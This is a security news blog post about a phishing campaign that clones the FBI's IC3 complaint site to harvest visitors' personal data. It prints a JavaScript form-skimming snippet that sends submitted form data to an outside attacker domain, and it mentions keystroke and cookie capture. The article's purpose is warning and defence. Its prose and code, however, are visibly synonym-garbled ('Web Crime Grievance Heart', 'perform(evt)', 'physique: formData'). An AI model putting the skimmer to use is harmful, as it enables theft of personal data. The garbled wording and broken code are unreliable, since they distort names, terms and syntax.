Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Threat Actors Impersonate FBI IC3 Website to Steal The Visitors’ Personal Information

Posted on September 22, 2025September 22, 2025 By CWS

A complicated spoofing marketing campaign has emerged concentrating on the Federal Bureau of Investigation’s Web Crime Grievance Heart (IC3).

Starting in mid-September 2025, victims making an attempt to entry IC3’s official portal had been redirected to fraudulent domains crafted to reflect the official web site.

The impersonators employed look-alike URLs—akin to “ic3-gov.com” and “ic3gov.org”—and reproduced genuine branding, together with the FBI seal and IC3 banner.

Guests who entered private knowledge discovered their data harvested for identification theft and monetary fraud.

IC3 analysts recognized the primary wave of those fraudulent websites on September 18, 2025, when a number of stories surfaced of tourists receiving misleading emails purportedly confirming IC3 report submissions.

These messages contained hyperlinks that led to cloned pages demanding in depth personally identifiable data (PII).

Though the preliminary entry level resembled a routine affirmation discover, the marketing campaign’s underlying payload quietly exfiltrated all kind knowledge to attacker-controlled servers.

Following these early alerts, IC3 researchers famous that the spoofed infrastructure was hosted through bulletproof suppliers, enabling fast area rotation and minimal takedown functionality.

Victims who tried to “report” crimes or replace present stories unwittingly supplied names, house addresses, cellphone numbers, e mail credentials, Social Safety numbers, and banking data—all transmitted in clear textual content over HTTP.

In some instances, the cloned pages hid extra JavaScript modules designed to seize keystrokes and cookies, additional compromising customer safety.

An infection Mechanism and Knowledge Harvesting

The malicious websites function purely by phishing and client-side scripting. Upon loading, a JavaScript snippet intercepts the official kind’s submit occasion, rerouting person inputs to an exfiltration endpoint earlier than permitting the browser to proceed or show a generic error.

A consultant snippet illustrates this tactic:-

doc.querySelector(‘kind#complaintForm’).addEventListener(‘submit’, perform(evt) {
evt.preventDefault();
var formData = new FormData(this);
fetch(‘https://malicious-ic3[.]internet/acquire’, {
methodology: ‘POST’,
physique: formData
}).then(() => this.submit());
});

This strategy permits seamless knowledge seize with out alerting the sufferer. The script additionally logs keystrokes through an injected listener on all enter fields, amassing credentials and session cookies.

As a result of the code is embedded immediately within the web page’s HTML, conventional antivirus options counting on signature-based detection wrestle to flag the risk.

Subsequent community evaluation revealed repeated POST requests to the malicious area shortly after every kind submission, confirming profitable knowledge exfiltration.

Professionals are urged to confirm the URL, guarantee HTTPS with a legitimate .gov certificates, and report any suspicious IC3-branded pages to the FBI instantly.

Discover this Story Attention-grabbing! Comply with us on Google Information, LinkedIn, and X to Get Extra On the spot Updates.

Cyber Security News Tags:Actors, FBI, IC3, Impersonate, Information, Personal, Steal, Threat, Visitors, Website

Post navigation

Previous Post: How to Gain Control of AI Agents and Non-Human Identities
Next Post: HoundBytes Launches Automated Security Analyst

Related Posts

Malicious VS Code Extensions Attacking Windows Solidity Developers to Steal Login Credentials Cyber Security News
Cloudflare Unveils MCP Server Portals to Secure AI Revolution Cyber Security News
MediaTek July 2025 Security Update Patches Vulnerabilities Affecting a Wide Range of Their Chipsets Cyber Security News
A Free Zero Trust Web Application Firewall for 2026 Cyber Security News
New EggStreme Malware With Fileless Capabilities Leverages DLL Sideloading to Execute Payloads Cyber Security News
BMW Allegedly Breached by Everest Ransomware Group, Internal Documents Reportedly Stolen Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Windows 11 24H2 Update KB5064081 Breaks Video Content Playback
  • Mycroft Raises $3.5 Million for AI-Powered Security and Compliance Platform
  • Researchers Earn $150,000 for L1TF Exploit Leaking Data From Public Cloud
  • European Airport Disruptions Caused by Ransomware Attack
  • Chrome Type Confusion 0-Day Vulnerability Code Analysis Released

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Windows 11 24H2 Update KB5064081 Breaks Video Content Playback
  • Mycroft Raises $3.5 Million for AI-Powered Security and Compliance Platform
  • Researchers Earn $150,000 for L1TF Exploit Leaking Data From Public Cloud
  • European Airport Disruptions Caused by Ransomware Attack
  • Chrome Type Confusion 0-Day Vulnerability Code Analysis Released

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News